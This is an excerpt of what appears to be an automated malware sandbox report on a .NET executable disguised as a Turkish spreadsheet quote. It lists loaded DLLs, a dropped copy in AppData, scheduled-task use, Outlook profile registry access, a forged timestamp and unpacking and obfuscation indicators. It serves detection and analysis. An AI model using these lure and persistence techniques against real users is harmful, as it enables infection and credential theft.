Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: sZXF.pdbSHA256 source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, OnCgVRIhY.exe.0.dr
Source: Binary string: sZXF.pdb source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, OnCgVRIhY.exe.0.dr

Data Obfuscation
barindex
.NET source code contains potential unpacker
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, Form1.cs .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: OnCgVRIhY.exe.0.dr, Form1.cs .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.29f53b8.1.raw.unpack, JK.cs .Net Code: ve System.Reflection.Assembly.Load(byte[])
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.51d0000.5.raw.unpack, JK.cs .Net Code: ve System.Reflection.Assembly.Load(byte[])
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.6f00000.6.raw.unpack, Q9VkWOKC4Ua0fHmFDp.cs .Net Code: z1nhtEJ3eA System.Reflection.Assembly.Load(byte[])
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.29fe9d0.0.raw.unpack, JK.cs .Net Code: ve System.Reflection.Assembly.Load(byte[])
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3c785f0.2.raw.unpack, Q9VkWOKC4Ua0fHmFDp.cs .Net Code: z1nhtEJ3eA System.Reflection.Assembly.Load(byte[])
Source: 10.2.OnCgVRIhY.exe.2d0e8fc.0.raw.unpack, JK.cs .Net Code: ve System.Reflection.Assembly.Load(byte[])
Binary contains a suspicious time stamp
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Static PE information: 0xCCC428E2 [Fri Nov 11 15:53:06 2078 UTC]
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Code function: 10_2_02B9EF83 push eax; iretd 10_2_02B9EF89
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Static PE information: section name: .text entropy: 7.876320634806518
Source: OnCgVRIhY.exe.0.dr Static PE information: section name: .text entropy: 7.876320634806518
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.29f53b8.1.raw.unpack, JK.cs High entropy of concatenated method names: 'JK', 'Y3', 'Lv', 'F5', 'q9', 'Ou', 'NL', 'tg', 'Jy', 'kq'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.51d0000.5.raw.unpack, JK.cs High entropy of concatenated method names: 'JK', 'Y3', 'Lv', 'F5', 'q9', 'Ou', 'NL', 'tg', 'Jy', 'kq'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.6f00000.6.raw.unpack, muxAdPcj7s8dTKeU0M1.cs High entropy of concatenated method names: 'nSndWDpqKO', 'dbEd30OVWy', 'qUldt8MPyW', 'SesdIjv56c', 'Wt6dOvqsPx', 'iCldnsGVBf', 'AdvdfPOheS', 'UF4dESwJsE', 'R99dehWAqV', 'lZVdYZ06qP'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.6f00000.6.raw.unpack, jr3hpQ2ACqqIXbdsNc.cs High entropy of concatenated method names: 'jKs4EgOelN', 'vqX4eDCoLl', 'omK4mKidVU', 'nS34cva8sp', 'EBZ4UO7YQA', 'UmB42paUSk', 'WtG4VUm1HE', 'afe4GBari5', 'd3M48P5Yoq', 'HM7499Xfe2'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.6f00000.6.raw.unpack, MKXpECdQ1EKtaxsDnO.cs High entropy of concatenated method names: 'GvpRWTEb8F', 'wlWR3Eg1tZ', 'oYnRtfdB9s', 'NshRI6IOVv', 'TxDROixtYU', 'KbCRnS12iV', 'AtXRfuOi8D', 'MHQRE7MBsb', 'oXGReqfHNi', 'G54RYD4lGA'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.6f00000.6.raw.unpack, vwEmPIAIK9wQH0mvMp.cs High entropy of concatenated method names: 'SfiLOQ6r8s', 'du5LfW5DRf', 'DZfXyXymCl', 'GavXU7CtIO', 'AZgX2gyf6J', 'bcSXQX6O6N', 'lWsXVDq5AY', 'uL7XG1ulU7', 'DSqXs0AnGP', 'pYLX88wFl8'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.6f00000.6.raw.unpack, safV0hi54xbxv1r7gV.cs High entropy of concatenated method names: 'JoDju5hUOK', 'T5yjZQLFSh', 'LJljA75qoF', 'vZCjv01jco', 'Rvsj5wVuL3', 'GrgjNKIltS', 'GtejCk2MSG', 'TuLjPE12y7', 'Ad4j6yhwLd', 'JjIjThgjMx'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.6f00000.6.raw.unpack, Q9VkWOKC4Ua0fHmFDp.cs High entropy of concatenated method names: 'NSR1Ft6BRM', 'JpE1M5GHPK', 'ysv1jPoYGI', 'r1T1Xmnh3A', 'Xgr1Leg6T8', 'jmd1HKPLIs', 'IBC1RFjwTh', 'Cq01gVmDBW', 'lnB1J20H6r', 'GO117CxStT'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.6f00000.6.raw.unpack, eSH1hNhtZBn7B5GLJb.cs High entropy of concatenated method names: 'Dispose', 'fqpb6fIfLP', 'GsswcLQbAy', 'yf0kkJkAAx', 'TXbbTux2vq', 'CpxbzldOjV', 'ProcessDialogKey', 'j0swimftTc', 'DaOwbjYT61', 'tE6wwhnLob'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.6f00000.6.raw.unpack, Q9xghsc13POXL59hd36.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'u85Bu5i7xO', 'aQ3BZdntuW', 'gMCBAHdROw', 'NWvBvlaLoG', 'tLrB5wuG4r', 'TdsBNjqoSn', 'wK2BCSJGZR'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.6f00000.6.raw.unpack, zn3NCY79dmYgsr4fSN.cs High entropy of concatenated method names: 'ToqSMSZIGS', 'pQZSjTJ0kx', 'Jb2SXy7jOJ', 'duTSLAvi6C', 'rAVSHYxNFi', 'UOtSRC6voH', 'gU9SgrU4J8', 'uK4SJUDQyE', 'nCUS7KNbSZ', 'YprSxY92N0'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.6f00000.6.raw.unpack, LVnkPGSGbiRthtxoiS.cs High entropy of concatenated method names: 'irnXIZYoL9', 'dp8XnmroBs', 'XoNXEALpOm', 'qyqXeXiqKC', 'aBnXD8KkZV', 'd2FXpv33Kf', 'YKjXlMd3Ur', 'i0EXSwkDiE', 'G2kXdApiJt', 'kMeXBXF6Qn'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.6f00000.6.raw.unpack, RTVPJ8XYj41c8rxLq2.cs High entropy of concatenated method names: 'G63D8hWHGw', 'giDDopx3SQ', 'RvrDuWo39b', 'BFsDZlpW9e', 'B2FDcH77Ax', 'EdpDy49NMl', 'qClDUoXvQR', 'lp7D2fi1ny', 'SrGDQTMGOU', 'H4RDV3XSUt'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.6f00000.6.raw.unpack, gIg4FK4ptc3iNx3d5t.cs High entropy of concatenated method names: 'wRElPNnvqU', 'nXVlTo7h9R', 'CiOSiKnHce', 'oxhSbPdQ88', 'gpil9IwqTi', 'LjsloLXQ0p', 'onflrkBGq0', 'DEHlupGW9J', 'AnSlZkakXo', 'z34lAr1JSd'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.6f00000.6.raw.unpack, igcy6eyM1j3LjtvZJ4.cs High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'dJew6m5Ba2', 'wp1wT7a9Wc', 'RkpwzEwTMa', 'rkh1iChxIg', 'b351bvRT35', 'K3C1w8bsGs', 'HEb11Qoron', 'iCqwtQSsDopRtO3goQM'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.6f00000.6.raw.unpack, PmlP9aQ2SI5idMhMtL.cs High entropy of concatenated method names: 'IZQSmpfMMR', 'GaiScNwT1T', 'CYYSysn0PK', 'GaHSUjr1s5', 'FKZSutFthS', 'J3SS250VYq', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.6f00000.6.raw.unpack, iuk0KnTfCYRw9jb2D8.cs High entropy of concatenated method names: 'pWRdbJCrUT', 'QmWd125csB', 'OBHdhr8aX5', 'UNrdM7wArk', 'a9cdjGm5Gp', 'MMAdLKGEMy', 'g2OdHyl2h5', 'QNPSC5RCem', 'zHTSPfh04g', 'KFgS6AYAgO'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.6f00000.6.raw.unpack, RaXMABvfFfu6o5SOSX.cs High entropy of concatenated method names: 'CqGttgN3h', 'G0uIOCG0a', 'FRknrvQ2N', 'tKtff0t4c', 'w5te3ZZfT', 'AuMYkaQXq', 'VSEyD3pMEtBHmcH8KS', 'HYycmCu58Ub9AFt5xv', 'rwbSRnjcp', 'obABqbI0S'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.6f00000.6.raw.unpack, we3YK7qH5g3FHYcDWm.cs High entropy of concatenated method names: 'ToString', 'oIBp927gdn', 'LJXpcSgOyA', 'yImpyId8KS', 'DPmpUCiFU5', 'EX1p2uCmvC', 'EYPpQJX7tM', 'PNRpVdEQjg', 'm35pGrCgRZ', 'ux6psQEZDT'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.6f00000.6.raw.unpack, hqmIe8lu5adE3g7l3p.cs High entropy of concatenated method names: 'B9jHFVF6Ol', 'ueuHj4J5PE', 'SkBHLyjcAS', 'kw8HRWMp7w', 'hsjHgHs9YU', 'wwKL5A6URS', 'ucaLNlKJhP', 'PUXLCYmvxJ', 'BOALPuOyG8', 'wYML65wlaA'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.6f00000.6.raw.unpack, gWIJvlOyuCsqmNZsPS.cs High entropy of concatenated method names: 'UrmbRKQ5sU', 'AopbgQdIA8', 'SKVb70Hurd', 'fIvbxfBe5i', 'FEfbD2yc3T', 'XMZbpwqZf7', 'Dspcn65mXoymH9kVEk', 'yMMNt9JF3SOVneNc1L', 'PWnbbVuFpB', 'obvb10b9sG'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.29fe9d0.0.raw.unpack, JK.cs High entropy of concatenated method names: 'JK', 'Y3', 'Lv', 'F5', 'q9', 'Ou', 'NL', 'tg', 'Jy', 'kq'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3c785f0.2.raw.unpack, muxAdPcj7s8dTKeU0M1.cs High entropy of concatenated method names: 'nSndWDpqKO', 'dbEd30OVWy', 'qUldt8MPyW', 'SesdIjv56c', 'Wt6dOvqsPx', 'iCldnsGVBf', 'AdvdfPOheS', 'UF4dESwJsE', 'R99dehWAqV', 'lZVdYZ06qP'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3c785f0.2.raw.unpack, jr3hpQ2ACqqIXbdsNc.cs High entropy of concatenated method names: 'jKs4EgOelN', 'vqX4eDCoLl', 'omK4mKidVU', 'nS34cva8sp', 'EBZ4UO7YQA', 'UmB42paUSk', 'WtG4VUm1HE', 'afe4GBari5', 'd3M48P5Yoq', 'HM7499Xfe2'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3c785f0.2.raw.unpack, MKXpECdQ1EKtaxsDnO.cs High entropy of concatenated method names: 'GvpRWTEb8F', 'wlWR3Eg1tZ', 'oYnRtfdB9s', 'NshRI6IOVv', 'TxDROixtYU', 'KbCRnS12iV', 'AtXRfuOi8D', 'MHQRE7MBsb', 'oXGReqfHNi', 'G54RYD4lGA'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3c785f0.2.raw.unpack, vwEmPIAIK9wQH0mvMp.cs High entropy of concatenated method names: 'SfiLOQ6r8s', 'du5LfW5DRf', 'DZfXyXymCl', 'GavXU7CtIO', 'AZgX2gyf6J', 'bcSXQX6O6N', 'lWsXVDq5AY', 'uL7XG1ulU7', 'DSqXs0AnGP', 'pYLX88wFl8'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3c785f0.2.raw.unpack, safV0hi54xbxv1r7gV.cs High entropy of concatenated method names: 'JoDju5hUOK', 'T5yjZQLFSh', 'LJljA75qoF', 'vZCjv01jco', 'Rvsj5wVuL3', 'GrgjNKIltS', 'GtejCk2MSG', 'TuLjPE12y7', 'Ad4j6yhwLd', 'JjIjThgjMx'
